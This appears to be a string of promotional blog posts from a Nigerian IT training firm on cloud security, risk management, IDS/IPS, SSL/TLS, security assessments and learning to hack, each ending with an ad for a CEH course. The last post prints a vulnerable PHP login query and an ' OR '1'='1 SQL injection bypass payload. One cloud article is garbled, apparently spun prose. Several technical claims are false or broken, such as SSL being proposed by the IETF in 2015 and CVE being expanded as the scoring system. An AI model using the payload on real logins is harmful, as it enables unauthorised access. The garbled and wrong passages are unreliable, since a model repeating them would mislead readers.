There has been a rapid growth in the use of cloud storage and the cloud technology is gradually moving from the ‘cloud-first’ strategy to the ‘cloud-only strategy. This is because the technology of cloud computing is in the year 2020 expected to have up to take up to about 70% of the enterprise software as well as the infrastructure.
The growth in the technology of public cloud has exposed organizations to trending security threats that normally cannot be minimized by employing endpoint security methodologies and technologies.
Security will be compromised because without applying the modern and cloud-native approach. The factors that affect the security include;
The architecture of cloud is entirely different from the legacy data centers which require some new approaches in the area of security. Traditional tools like penetration testing tools and network scanners are so reliable because the cloud is API-centric.
2. Increase of DevOps
When it comes to using public cloud, DevOps are on their own which end up not involving, not informing and not making central IT security teams aware. IT security teams require a new method to monitor the event of things because so many organizations are pushing are changing codes and productions everyday.
3. A More sophisticated landscape for threat
Hackers have kept the pace of in the deployment of similar tactics in order to automate attacks while DevOps teams have driven in the direction of making their code deployment process automated. This means that the surface of the attacks has been changed and there is not a path of traffic that can be monitored again. Security teams in order to ensure they have more visibility have resorted to deploying the use of new tools in all aspects of the organizations cloud applications.
The Four step program in bolstering cloud security
The issues surrounding the cloud security can be solved by the use of modern and cloud-native platforms which can make automation process very easy in order to provide a monitoring process that is continuous and further more analyse and remediate for cloud security compliance. This model has been able to offer a much better avenue for protection in the cloud far more than the traditional security platforms. Top cloud security experts have revealed that in order to achieve a continuous and automated cloud security and compliance, four key elements have to be addressed which are
- Real-time discovery in order to match the increasing pace of cloud changes: It is quite unusual for firms and organizations to possess millions of data points which require evaluation with the increasing cruelty surrounding the deployments in the cloud. A platform that can handle all the data in real time and isolating rapidly any form of security deviations and variations from good states is needed to the keep the functionality is cloud active
- Automated Action: One thing organizations must do is to automate monitor and remediate these processes to keep up. They need also to be flexible in the aspect of determining the way automated responses are made. They must also be able to inform the human administrators if there is a need for any other action.
- Deep insights to identify risks that may not be obvious: Communication can falter when the number of teams is large. You should make provision on your platform for teams to gain ownership of their security while also setting up security operations for other teams and corporate management in the bigger picture. This platform must be able to evaluate security information and details alongside the global customer base or across time and geography to put out a warning against potential issues before they occur.
- Comprehensive and properly detailed reports must be put together by teams about their daily security compliances and this should not necessarily be done during the yearly audit. You should be able to view the past and present state of your security and compliance stances by just a glance.
In conclusion, as organizations and firms make efforts to rely on public cloud in order to drive their daily business schemes and activities, they should also focus on the security risks and simplify the processes that are involved in the assurance of protection and compliance. Continuous security and compliance present us with new opportunities in order to maximize the value of the public cloud in the process of trying to minimize the risk.
It is very important to place our focus on the key characteristics such as automation, deep-insights and robust reporting and real-time discovery while evaluating potential cloud security platforms. The is a popular saying the IT world that the deployment of cloud technology changes everything but what doesn’t change is the importance of ensuring security and compliance.
To learn more about the security of the cloud environment as well as other security methodologies such as, vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.
Cybersecurity breaches are inevitable; What to do to stay safe- Information Security tips-SOUTECH NigeriaEsang U. E
Cybersecurity threats have become a cause of concern for many organizations especially with the daily reports of cyber intrusions where large volumes of data theft and intellectual property are involved. With the rise of new exploitation techniques and methods such as insider threats ransomwares, and advanced persistent threats the need for investing in cybersecurity cannot be over emphasized.
It has also be proven to be difficult to find rapt solutions to cyberattacks because of the dynamism in cloud computing, operating environment, supporting mobile, the iOt (internet of things), remote users, the quest for support the network devices that users bring to their offices and of course the question of how, where and what strategies to deploy in terms of specific security.
James Comey, a former director in the FBI described two kinds of big companies in the United States. He categorized them into “into those who have been hacked by the Chinese and those who have not been hacked by the Chinese.” Also in January 2015 at the world Economic Forum which was about a year later, John Chambers a former CEO Cisco confirmed that the people that have been hacked, do not even know they have been hacked.”
From all of this information, does it mean that cybersecurity breaches are inevitable? If a cybersecurity breach is inevitable then is prevention really possible and is trying to secure data and data systems worth the money?
Despite the fact that these remarks are quite discouraging, organizations still go ahead with storing data, financial data, intellectual property and their personal data on networked systems. In the midst of all these risks, there are the good sides to data storage and security which outweigh the bad sides.
Cybersecurity involves managing risks
There are things that should be put in place to secure information even with the fact that cybersecurity breaches cannot be avoided. In environments where risk is managed, there are ways and processes that can be put in place to ensure that data breaches are avoided which I have described in my previous article as penetration testing, vulnerability assessments, and IT audits. The premise surrounding the management of risk, is that the risk scenario cannot be completely eliminated.
If these uncertainties can be erased, then the risk can totally be erased as well. There are two basic security measures that can be put in place if the risk of a cybersecurity breach does not amount zero. Now the first strategy is to cut down the probability of the occurrence of a cybersecurity breach and the second involves cutting down on the impact which the damage that occurs when a cybersecurity risk is discovered. In order to manage any type of cybersecurity risks, these two strategies and measures are very appropriate in managing them. Do not forget that the general way to approach cybersecurity is very transparent and easy to understand.
The first things to identify in the operation of business is the assets which means that information assets which include raw data, people, processes and technology have to be protected.
The second thing you must note is that the purpose of a risk assessment is to reveal risks scenarios which could lead to damage or loss of data through unauthorized and unexpected disclosures, modifications and loss of confidentiality of data assets. Risks components are very few. The typical scenario of a cybersecurity intrusion is when a threat leverages on a vulnerability to damage information asset security. In this example, the components of risk exist when there is vulnerability and an exploit takes advantage of that vulnerability, and also a threat actor uses that exploit to damage the information assets’ security. Therefore, the only things that can be controlled by the network security manager are the presence of vulnerabilities on the network. The next step that follows is making an attempt to identify the risk and eliminating it.
Typically, once a risk has been identified, it is known to be eliminated and when a vulnerability is eliminated, all the threat scenarios where the vulnerability is exploited is reduced to zero.
Cybersecurity Risk Prioritization
Risk management at its core is a decision-support tool and once all the necessary cybersecurity scenarios have been unraveled, the job of the decision-support tool is to prioritize the order and manner in which the identified risks can be mitigated or controlled.
If there are insufficient resources that are capable of handling all the identified vulnerabilities, then the activity of risk prioritization with an aim to remediate and mitigate it can be seen to be important. Prioritization is also very valuable even in the midst of sufficient resources in order to remediate the existing vulnerabilities.
Outcome vs Impact
The prioritization of vulnerabilities is based on its potential impact on the organization if the risk scenarios exploiting that vulnerability are all realized. It is important to try to understand what the impact is if the potential impact is the prioritization factor. Whenever a vulnerability is being exploited, there is an unwanted outcome which involves an unwanted disclosure of data, unauthorized modification or the loss of access to the information asset that is being affected by the vulnerability is being exploitation. The result if an unwanted outcome is referred to as impact.
In the HIPAA privacy or security rules, if the health records are stolen, the outcome is that information will be disclosed, but the impact to the organizations is that there could be there will be a mandatory breach in the costs of notification and the potential for fines and civil penalties could run into millions of naira and dollars.
The prioritization of vulnerability mitigation by its potential impact can be done in different ways and one of them is in the use of a prioritization tool called Common vulnerability scoring System (CVSS), which will provide a framework for which one can understand the characteristics and impacts of vulnerabilities in information technology.
When CVSS is used, there is a likelihood that when an organization discovers that its risk has been prioritized to low severity or medium severity, they will choose not to remediate it. But in the case of organizations with many systems including mission-critical systems, such organizations need to come to an understanding that the potential impact to that asset and organizations is not totally and solely dependent on the ratings of the CVSS, but it could be higher and the organization needs to remediate the vulnerability.
In conclusion, if it is true that cybersecurity breaches cannot be avoided then all is not lost. The only sad thing is it will not be possible to completely eliminate the uncertainty that there will be data breaches.
To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.
The need for an Automated Approach to Cloud Security and Compliance- Challanges in Cloud Computing-Soutech NigeriaEducationEsang U. E
Regardless of whether you are in charge of general IT, IT security, DevOps or administrative compliance, odds are open cloud services are a consistently developing piece of your portfolio. This can be extraordinary for the business, empowering lower costs, more prominent dexterity and speedier speed to advertise. Be that as it may, it can exhibit new and serious difficulties in guaranteeing security and compliance.
The public cloud is a radical new world. In the event that you think customary techniques for securing the data center or firewalling the border will keep your information and applications secured, you might be in for a reality check. The main issue with taking an approach in the form of a legacy approach is that they were not intended for the cloud period, which implies they don’t support or make use of the API-driven infrastructure of the public cloud.
Whatever your part is in your organization, you can infer huge advantages by grasping a present day, cloud-local model that utilizes equipment that are built on purpose to consistently and consequently screen and oversee security and compliance along the API control plane.
If you are in charge of IT, security or compliance, you can diminish costs, enhance security and affirm more prominent control over cloud technology and shadow IT. In the event that you are in DevOps, you can move rapidly without sitting tight for endorsements from security—while disposing of the potential for the calamity that is continually approaching if appropriate security and consistence balanced governance are not being set up.
Given the proper cloud security platform, the general organization can make of use automation to decrease risk and expel the human components from imperative procedures. Automation enables you to accomplish and achieve a constant visibility scheme over your cloud deployments, empowering reliable duplication among use conditions, for example, improvement, organizing and creation.
Automation, Security, Compliance and the cloud
The adoption of cloud technology moves too rapidly and is liable to excessively quick changes for organizations and firms to depend on manual assets. The major test, be that as it may, is that most organizations still utilize legacy devices, innovations and methodologies to oversee cloud security and compliance.
Luckily, new cloud-local arrangements are presently accessible, conveying an agent-less platform intended particularly for recent modern clouds.
These arrangements use the cloud’s API engineering architecture to determine gigantic adaptability in scaling and overseeing cloud security and compliance.
The steps below therefore will depict how an advanced automated approach to deal with persistent cloud security and compliance works. It depends on the Evident Security Platform from driving cloud security firm Evident.
Close Observation: The environment revolving around cloud computing is evolving persistently. These progressions can be ordinary, routine exercises of your DevOps or IT groups; they can likewise be crafted by individuals who might do mischief to your business. As changes are made—over all cloud platforms, services and regions—the cloud security platform screens the designs of the cloud infrastructure to guarantee that it holds fast to security and compliance best practices.
Assessment: The security platform safely gathers information about the services in your cloud and constantly performs checks against a progression of foreordained best security standards. It additionally performs checks against any predefined custom marks. These checks decide, on a persistent premise, if there are any conceivably exploitable vulnerabilities.
In-depth Analysis: The platform at that point plays out an investigation to decide if the misconfigurations and exposures are prioritized and quantified into high, medium or low risk levels.
Automated Remediation: The result of the subsequent analysis being performed is shown on a dashboard and can be sent to incorporated frameworks for auto-remediation work processes to set in.
Robust Reporting: Comprehensive and detailed reports are made accessible so your groups can see data involving the risk, as well as client attribution and infected assets.
Correction: The groups would then be able to utilize simple-to-follow remediation methodologies to recover the infrastructure to a safe state.
Public cloud is not going to be phased out any time soon but before the decade’s over, people in general cloud administrations/services market will surpass $230 billion, as predicted by Forrester Research. As cloud turns out to be more key to the accomplishment of your organization, it is key that you concentrate on security and compliance, regardless of whether your part is in IT, security, DevOps or corporate administration and compliance.
By grasping a constant security model, your organization will have the capacity to process many procedures that would overpower your groups and frameworks on the premise that they must be done manually. It not just accommodates upgraded security and compliance assurances, it likewise calms the weight on your staff, enhances security for DevOPs and different groups, and brings down the cost and danger of cloud security and compliance.
Cloud computing and its associated technologies is a very broad field. But I have in a few of my writeups been able to discuss the few trends and challenges that is being faced in the cloud environment. To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn CEH course in details.
Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) have been very effective over the years in countering against cyberattacks and also in the securing the network perimeter on the segments of the internal network. They serve as extra eyes in the aspect of securing data from losses and authorized access and any form of damages which can lead to collateral damages to the organization in both monetary terms and its reputation.
Now, the usage and effectiveness of this devices and technology can only survive when there is sufficient manpower and training. Organizations and network administrators must come to the knowledge that the use of IDSs and IPSs require training in other to interpret and act on its results.
There are benefits in the deployment of the technology of IDS/IPSes in businesses which include
- Identifying the number and the type of security incidents.
- Making sure security events do not escalate to security incidents.
- Improving on the ability if network devices being discovered
- Protection of vulnerable assets.
- Protection of Operating systems and application softwares
The use of all the information obtained here to meet various regulatory requirements.
Now let us go ahead and explore the benefits of IDS/IPS in information security.
1.Identifying security incidents
The technologies of IDS/IPS do not only help to capture logs of IP addresses and ports of the communication going between different systems but can also be used to identify some specific content inside a network packet. Example, they can use botnet controllers can capture reports that have been identified from any compromised endpoint devices and can also identify DDOS attacks.
The sensor in modern IDS/IPS can help to quantify the types and the numbers of such attacks that an organization is vulnerable to and can go further to help it alter any existing security controls and deploy some new ones. It can also identify bugs in softwares and address host and network device configuration issues. The results determined can be used to perform further risk assessments.
2. Prevention of Security incident
The deployment of IDS/IPS technology can help to prevent the occurrence of security incidents which it does by disrupting communication between an attacker and his target, it can also report security incidents as well. Sensors in modern IDS/IPS can take packets in the network and examine them based on the context of the protocols supporting it. Example, if there is an HTTP protocol attack such as cross site scripting and SQL injection attack, it can be detected and blocked. The sensors in IDS/IPS can identify and block anomalous behavior which can be in form of an out-bound traffic.
3.Protection of vulnerable assets
IDS/IPS have been upgraded to be virtual patches for some software vulnerabilities. This enables network administrators to block any form of attacks until patches have been developed for such software vulnerabilities and until the cost for replacing systems until the patches are ready. The ability to identify the level of patches can be very useful for gauging the deployment of patches and for automation of vulnerability assessments.
4. Identification of network devices and hosts
Sensors in IDS/IPS can be used in a passive means to detect the presence of network devices and hosts as well. They can do this based on;
- The data within the network packets in real time
- Identify operating systems and services which are offered by the network device of the host.
This can help to eliminate a great deal of the manual work that can be applicable in determining the number of systems that are available alongside their configurations. Apart from helping the automation of hardware inventories, IDS/IPS can be applicable in the identification of rogue devices in the network like unauthorized hosts and rogue wireless access points and rogue hotspots.
5. Leveraging of information gained to meet regulatory requirements
IDS/IPS have the ability to give an organization deep insight into their networks and their connected resources. Regulatory mandates can also be met for example in the PCI-DSS 1.1.6 documentation, there is permission for the documentation and business justification of use of all the services and protocols and it can be researched using reports obtained from IDS/IPS logs.
6. Improvement in the Return on Investment (ROI)
There has been an identification of some improved efficiencies and the attendance of labour costs. An organization can determine how much of a return on investment (ROI) IDS/IPS it can supply if the infrastructure is able to reduce or completely mitigate two major things which include;
- Degradation and denial of internet service and/or internal network service such as application service downtimes and business ramifications of the network.
- A security breach which involves the loss of sensitive customer information and credentials as well as intellectual property.
My word for network administrators is to explore more on the use of the IDS/IPS to boost business and ensure that asides their basic functions, they are able to harness other functionalities in these devices.
To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.
One of the major issues that Computer Information Officers and chief Information Security Officers (CISO) is in the aspect of gaining visibility into the posture of their cloud security. How can they be expected to put in the place the proper and necessary controls and security measures if they cannot even identify where there are security flaws and where they exist.
If there isn’t a new approach, the problems will aggravate even before there is any hope of rendering a solution. Now why is this so?
Let us see various ways;
Without a new approach, the problems promise to get a whole lot worse before they get better. Why? Let us count the ways:
1.Growth of public cloud: Organizations have now deployed the use of cloud services to a much degree ever more than before. According to a study the use of cloud services in the average enterprise now amounts to about 1,427 services.
2. Shadow IT:
A lot of the publicly available cloud services and applications result from the initiative of the shadow IT are usually out of the control of the security teams and line-of-business managers why seem not to be familiar with security and best practices in compliances.
3. DevOps: Like I mentioned in my follow-up article on DevOps, DevOps teams have continued to outpace security teams going out on their own to deploy public cloud services to increase the rate of their development.
These teams do not often want to dragged behind by the concerns of the security and compliance.
4. Tools and technologies that have become extinct: Traditional tools that can be used for monitoring remediation endpoints have not been effective in the environments of data centers and cannot be effective and efficient for use in the security of public clouds.
5. The Pace of change: For manual processes to be able to keep to the pace, cloud environments change too quickly. Let us assume that organizations are even able to hire and retain personnel that are trained and have experience in the compliance and management of cloud security. CISOs and CIOS need to really worry about complacency in the use of cloud storage because public cloud providers like amazon web services and MS Azure have stepped up their game in the past couple of years. And because of this, surveys have shown that IT heads are becoming less worried of the security challenges in cloud environment. It has also been discovered that the biggest risks are always more in the internal network than in the external network.
6. The relationship between automation, visibility and continuous security and compliance: The questions therefore is on how CIO’s and CISOs gain the needed visibility they may need in order to minimize and maximize protection. The simple answer is through automation and this can be achieved by automating the process of remediation, analyzing and putting up monitoring measures across the whole cloud environment, security teams can gain the visibility they need in order to address their biggest cloud security and compliance challenges. The architecture of the cloud makes it a perfect fit for an automated approach to security and compliance this is because architecture of the cloud environment uses the API model, cloud-native agentless solutions. This architecture can be deployed to give IT security and DevOps teams some level of tremendous visibility and flexibility. With and automated model, it is very possible for CIO and CISOs can;
- Obtain a view that gives bigger picture across all their cloud environments with a centralized means to manage and control events.
- Allow DevOps and other teams to manage best practices in security and compliance that can be necessary for their own cloud deployments and controls.
- Lower costs and reduce risk levels and complexities which can be done by replacing manual tasks with processes that are automated.
- Enhance time with respect to value which can be achieved by securely making use of the public cloud to empower the smaller teams be they individual lines if businesses or DevOps
- Flag risks and remediate the threats even before they get an opportunity or chance to affect availability, compliance and operations.
Finally, a plethora of openings Public cloud services have created for security officers by helping them to deliver significant value to their establishments in a lower costs, accelerated development cycles and greater work rate in productivity. However, there are a lot of risks masked behind these opportunities and these risks are surrounded by security and compliance. But the good thing is that there is a success path which can result in automation for providing continuous security and continuous compliance. This is the time to take the first step towards cloud security.
To learn more about the security of the cloud environment as well as other security methodologies such as, vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.
I’ll be teaching here on the Secure Sockets Layer because most of I believe have been hearing of SSL as a protocol but do not know how it works; don’t worry I’ve got you. What is SSL?
Secure Sockets Layer is a protocol applicable in computer networks that secures connections that exist between network application clients and servers on insecure networks such as the internet. SSL was proposed for use on the internet by the Internet Engineering Task Force (IETF) in 2015 because of the very many protocol and implementation flaws and vulnerabilities found in the other internet protocols. It has however been replaced by the TLS (Transport Layer Security) protocol. TLS and SSL are however not compatible together so therefore TLS is deployed in the SSL 3.0.
SSL was originally developed as a protocol in its proprietary state in the 1990s such that it allows the Netscape browser clients which work over the HTTP (hypertext Transfer Protocol) to communicate securely with Netscape web servers. SSL was eventually adopted for use to secure authentication and encryption in network transport layer communications.
Encryption Standard used in SSL
SSL makes use of two keys which are the public key and the symmetric key to ensure encryption when two machines when they establish a connection. These machines can typically be web or mail server and a client system communicating over the internet or some other TCP/IP network. SSL makes sure that data that is being sent between two processes working in the client and server model is encrypted and authenticated.
SSL works above the transport and network layer and is responsible for the transportation of data packets between processes and data routing of network traffic over a network between a client and server. It also works below the application layer protocols like the popular HTTP and SMTP (Simple Mail Transport Protocol).
Ever wondered what the word ‘socket’ in the term SSL refers to? It refers to the sockets method which data is transported between a client and server program in a certain network or between processes that take place on the same computer device.
Like I said, TLS protocol was developed from the SSL and has phased out the SSL protocol but in the aspect of SSL or SSL/TLS, they are still commonly used to refer to the protocol that was used to protect the internet traffic. SSL/TLS is the most widely deployed security protocol being used today and has been known secure up to about 50% of the pages that have been loaded on the Google chrome browser. SSL has been specifically implemented for applications such as email, file transfer, VoIPs, instant messaging which is an additional method to support the transmission of web pages.
How does SSL work?
The SSL protocol has majorly two sub-protocols which are;
- The Record Protocol: This protocol defines how the hosts communicating will use exchange data via the SSL which include specifications for how data is to be prepared before being transmitted. It also tells how the verification and decryption of the received data.
- The Handshake Protocol: This protocol defines how the client and server go about to establish an SSL connection. This includes the negotiation in way the cryptographic systems and each host is willing or unwilling to be engaged in the exchange of cryptographic materials. This includes the session keys and public keys for the encryption or authentication or transmitted data.
Now, during the handshake process, the initial process that takes place is that the server presents its digital certificate in order to be authenticated with the client. The server certificates use the X.509 certificate standard format which is defined by the public key cryptography standards. In order to be authenticated, the public key encryption validates the digital certificate and is used to confirm that the server is what it says it is.
Immediately the server is authenticated, the client and the server will go ahead to establish the settings of the cipher and a shared key will be used to encrypt the information that is being exchanged until the session expires. By this way, data confidentiality and integrity are assured and the whole process is invisible to the user.
Now let us look at this example, if a webpage is in need of an SSL connection, the URL will be changed from HTTP to HTTPS and you will see a padlock icon on the left pane of the browser once the server gets authenticated.
The handshake process allows the authentication to happen between the client and server. When the server authentication is complete, the client has to present its certificate to the server in order to authenticate its identity before it is encrypted for the SSL session to be established.
Version 3.1 of the SSL was released as TLS 1.0 (which was named to avoid legal issues with Netscape) after IETF officially took over the SSL protocol in order to standardize it through the open process. Attacks perpetrated against the SSL have been majorly been focused on issues in the SSL implementation. POODLE (Padding Oracle On Downgraded Legacy encryption) vulnerability is a known flaw in the SSL 3.0 protocol which is as a result of the way it ignores padded bytes when running in the cipher block chain mode. This existence of this flaw gives room for an attacker to decrypt sensitive data like the authentication cookies. TLS 1.0 has not been known to be vulnerable to attacks because it shows that all the padding bytes need to have the same value and must be authenticated.
There are some other differences between the TLS and SSL which make it a more secure and efficient protocol which is in its message authentication, generation of the key material, and the supported cipher suites where TLS supports some new and recent secure algorithms. The most recent version is the TLS 1.2 and the publication of the next version is expected before the year of this year 2017 pending approval. This update may likely be called the TLS 1.3 or the TLS 2.0.
subscribe to our CEH course at SOUTECH ventures to know more about network security and this subject topic in full. Call us today: 08034121380
Check out SOUTECH bespoke training sessions of over 20 Professional IT courses.
Order any of our IT Training Kits
Dear reader, do you know of the best way to measure information security risk? My favorite answer is that you dive in immediately to find those vulnerabilities that are specifically inherent in your system and applications. This can be likened to humans going through different tests to know the situation of their health through blood tests and analysis as well as magnetic resonance imaging and the likes. Some IT experts may refer to this kind of exercise as IT security audits while some may refer to it as penetration testing. Well, I will say that when you are performing an in-depth analysis of any IT infrastructure, it is not just about comparing policies to the working mechanism of things and trying to proof a point. This is the reason why I prefer to call this exercise information security assessment. Information security assessment is a broader and a more meaningful standard to unravel areas where security policies and procedures are lagging.
The ultimate goal in security testing is to find and fix any form of weaknesses in a system before anyone gets to exploit them and this is the core reason why the semantics of security testing is debated. It is therefore the duty of all security professionals to ensure that proper steps and measures are taken to ensure risk identification is understood. Let us put ego and politics aside and ensure that the key components of an effective information security scheme is given the desired attention. What are the key components of a detailed information security assessment?
1.Support: One of the important components is support of management. This is because no good information security assessment scheme can be successful without first receiving the support of management. If the leadership of an organisation is not willing to invest immensely their resources into making sure that their IT infrastructure is protected to a great extent, then the battle will be much more uphill. The focus should be on getting and keeping the right team on the organizational board. The target should not be on just management but on the security staff and member of the team.
2. Scope: This is known to be a very vital phase of information security assessment and I have seen many examples where the applications, systems and even the entire IT network is being excluded from security testing. The reasons are usually the same which may be insufficient time and lack of money. In as much as you need to fine tune the scope of your work, you have to make sure that all the critical systems are looked at and as soon as possible. In subsequent times, you may need to totally look at your environment because it requires a benign system, network segments or security process to out everything in jeopardy. The systems to be considered are the external and internal systems as well as the systems that are being hosted in the cloud by third parties as well as the marketing website. Also, it is of absolute necessity to do an authentic security testing of both the web applications and the operating systems. Ensure all that there is a fair test conducted on the people, the processes and all the physical system.
3. Testing: The testing phase should include and begin with vulnerability scan by using a vulnerability scanner to perform a manual analysis to discover the areas that are susceptible to attacks as regards to our context of the business environment. This phase usually includes activities like;
- Password cracking
- Wireless network analysis
- Email phishing
The most important in this phase is to do an overview of the business environment from an attackers’ viewpoint in order to see the areas that can be exploited and then demonstrate what may happen so that the issue can be analyzed and steps taken towards resolving it.
4. Reporting: Doing a 500-page PDF report from a vulnerability scanner will not make it either easy to understand the issue or prevent it from happening. The aim of a report is to obtain a security assessment report that is concise prioritizes findings and recommendations on the way out. The report does not have to be lengthy but needs to be drafted in a way that will cut to the chase and give an detailed outline of the specific areas of weaknesses that should be given immediate and proper attention. This is often done from the viewpoint and professionalism of the security professional taking into account the business and systems. IT security auditing and penetration testing are the elements that are incorporated here as well. There are many standards to draft out good reports but I’m usually not a big fan of follow too many standards but I advocate that you draft out something that works for you. You can look out for templates such as the CVE (Common Vulnerability Scoring System) and some similar ratings which provide a severe rating for SNMP (Simple Network Management Protocol) which is being enabled with a two-default community string. If the vulnerabilities are discovered to be on very high risk, then what will be the dangers of a weak firewall password. Missing patches that are remotely exploitable, SQL injections on intrinsic web applications? What should rather be applicable here is common sense and the worst kind of information security assessment that can be performed and that will not have a formal report with issues that cannot be resolved.
5. Resolution: After a detailed report has been made, we must take all the discovered problems are try to develop solution plans for them. Majorly, problems should be found and fixed. I have seen security reports that contain unacknowledged and pending solutions after a security assessment. There is an easy fix which involves assigning responsibilities and ensuring that everyone is held accountable. The usual cycle for performing your information security assessments spans from 6months to a year depending on the environment. An alternative way is to do a follow-up from a time frame of 30 to 45 days after a report is drafted when performing a remediation validation of all the critical and highly prioritized findings.
6. Oversight: This involves ensuring that the security process between the security assessments will require things like tweaking of the existing systems and software including an implementation of the new technical controls with an outright of the policies and processes. Instead of trying to achieve a perfect security, your target should be on moving forward should on achieving a good security with a shorter time for catching flaws and resolving them. The management must be engaged with the task of achieving this plan with the executives kept on board with whats required in the aspect of compliance and contractual obligations. Whether or not they are interested, the right people must be kept to make sure security is ensured. By doing this Return on Investment is assured which is essential for business growth. Note that security is not out of mind but a priority.
As final words, I will say that the bottom line of the matter is that every business organisation has information and computing infrastructure that criminal hackers or malicious attackers are interested in for their gains. Of course, you know that you cannot totally be safe or immune from information risks and attacks so you must know the value of information security assessments. Organisations and businesses I would advise not to depend on IT security auditing and penetration testing to be safe. Neglecting IT security assessments is not a defensive option for due care. Furthermore, take out time to properly plan and strategize on how to perform information security assessment, ensuring that the task is completed and that the proper staff members in IT, development management and elsewhere are appraised on the findings so the matter can be resolved.
Some security professionals and vendors will try to paint it that information security assessment is not a difficult exercise to perform and will not be a very expensive project given its virtual return on investment. But I must tell you that your information security program will be a deep reflection of what you invest in. That means if you fail at it, then you stand a huge chance of shutting down your infrastructure. So, I will tell you a quote from warren Buffet which says “you only have to do a very few things in your life so long as you don’t do too many things wrong.” Assessments are never and will not be the perfect solution to your security problems even though it is performed periodically or consistently. The fact that you have tall fences, a big and strong gate and armed men at your does not guarantee 100% your safety. However, there is a big level of assurance that if you choose to ignore this exercise, history will of a surety repeat itself.
You can subscribe to our services at Soutech ventures to give you the desired security ideas that you may require to carry out a detailed and successful information security assessment. You can also learn our Ethical Hacking course from EC-Council which is desired to educate and give you hands-on knowledge on how to secure your infrastructure.
You are a beginner whose intention is to learn how to hack but you’re wondering where to start from. If you are in this category, then I’ve got your back, you are definitely in the right place. If you’ve noticed, most of the free books and resources on hacking you may find on the internet are actually crafted for persons with some level of knowledge in the specified subject area. These materials do not give a comprehensive knowledge of the hacking scheme.
This is however the reason why I have decided to post something for the beginners and anyone who needs to start their journey into the hacking world and being hackers. I am going to describe a few requirements and the basic things to do to make the journey a pleasant experience for you.
What is the Best way to Learn hacking as a beginner?
Here are a few steps; Lets go-
STEP 1: Start with the Basics
I will in my usual way always advice beginners who have had a little or not even a slight knowledge of hacking before to begin from the basics. Do not just learn how to hack anything but you can instead start exploring or doing some research about topics in IT such as computer networks, network services and common ports (FTP, TCP, SMTP, HTTP, HTTPS, DNS etc.), firewalls, some common and widely used network protocols, IP addresses. You can also their working mechanism.
You may also learn about some operating systems such as Linux which is one of the basic operating systems useful in the hacking environment. Just so you know, the more you know about the basic working principle of IT-related topics and concepts, the easier it becomes for you to find vulnerabilities and device exploits. This will also go a long way to help you when applying your hacking techniques in practice. Hacking covers the weaknesses or vulnerabilities in every field in IT, so you need to some extent a good background in basics. So begin your research now.
Step 2: Get a reliable and good source to begin your learning
If you desire to have a fair knowledge or basic hacking and the trending technologies in the IT field, there are books online and websites that can equip you technically. These books can also give you some technical background in vulnerabilities and any possible ways to exploit these vulnerabilities. However, it can be very difficult to find such books and web resources that can directly teach you how to hack from the basics in a simple and easy way.
If one has a fair amount of experience in the field of hacking, there exists so many books and websites that give out technical information on latest vulnerabilities along with possible ways to exploit them. However, for beginners it is hard to find sources that teach hacking right from the basics in a simple and easy to follow manner.
Step 3: Learn a programming Language (Optional)
Step 4: Enroll for an Enthical Hacking Course
One of the courses that has been structured to give you apt and excellent knowledge and skill in hacking is the EC Council Certified Ethical Hacker (CEH) course. There are other courses that are in this line such as CISSP which is governed by another body. But CEH is a basic start for you if you must learn about hacking and be very grounded. CEH v9 offers about 19 modules that are well structured to cover all the IT fields.
If you are in Nigeria and in the cities of Abuja and Lagos precisely and you intend to take up a CEH course, you can call us today at Soutech ventures or visit our website. You have every information you may need. We have experienced and certified tutors in this field that can teach you with clear and simple breakdown of concepts of the CEH syllabus. So be sure you have made a right choice in Soutech.
How Long does it take to be a Good Hacker?
I always tell my students that hacking cannot be mastered overnight and the process must never be rushed. It is a field that combines in-depth knowledge, skills, creativity, dedication and a great deal of time to be invested. It may take between a few months to a few years to develop and be skillful in hacking depending on the time and effort you invest. Infact, everyone can become very skillful but it depends on the on how they learn and their foundations they build. The foundation you give yourself matters a great deal, if the foundation is lagging in a certain aspect, you will have issues in understanding and working on some technical details. So, if you want to become a good hacker, all you need is the passion to learn and a good source of knowledge that will help you understand the basics added with some level of patience and perseverance.
What is SQL Injection?
SQL Injection often referred to as seqel-i or structured query language is a malicious attempt on a website whereby an attacker injects an SQL command (payload) into an SQL statement which controls the database of a web application. The web application can also be referred to as Relational Database Management System (RDBMS) and it has a web input field.
SQL injection vulnerabilities have been known to damage websites or web apps that use SQL-based database. SQLi’s have been known over time to be one of the lethal means of attacking websites whereby an attacker attempts to exploit a web application. In order to bypass the authentication and authorization mechanisms in a web application, the attacker will attempt to gain unauthorized access to the web app using SQLi. The attacker or malicious user after gaining access into the web application, can delete, modify or even update the database, make changes to the columns or rows depending on what their intentions are at the time. When this is done, the data integrity of the SQL-based database will be compromised.
How Does SQL Injection work?
In order to exploit the web application, all the attacker has to do is to find an input field that is embedded in the SQL query of the database. A vulnerable website requires a direct user input in the SQL statement in order for an SQLi attack to take place. When this is done, the attacker then injects the payload which is included in the SQL query which in turn is used to launch the attack on the web server.
Before you launch any attack, you have to check the server to see how it responds to user inputs for authentication mechanism. Use the following queries to verify the users authentication mechanism:
// define POST variables
$Uname = $_POST[‘name’];
$Upassword = $_POST[‘password’];
// sql query vulnerable to SQLi
$sql = “SELECT id from users where username = ‘Uname’ && password = ‘Upassword’ “;
// execute the sql query by database
The codes above are vulnerable to SQL injection and the attacker can submit the malicious payload in the SQL query gain access to the web application by altering the SQL statement that is being executed.
One example of an SQL injection payload that can be used to set a password field is
Password’ OR ‘1’=’1’
where this condition is always true, the result of this query being run against the web server is
SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’
What an attacker can do with SQL?
SQL is a programming language that is used to work with the relational database management systems. Like I said earlier, SQL’s can be used to delete, modify or update databases or columns, rows, tables within the RDBMS databases. SQL is one powerful language that can be used to attack databases and can be used by attackers to exploit databases of web applications, taking total charge of the application without the knowledge of the administrator.
Having said all this, let us see what an attacker can use SQLi to do.
- It can be used to bypass authentication mechanisms or to impersonate a specific user
- It can be used by an attacker to delete records from a database and even if an authorized backup plan is used, deleted data can affect the availability of an application until the database can be restored.
- SQL’s can be used to select data based on a set of input queries which gives outputs of the query. It could allow the disclosure of data residing on the web server.
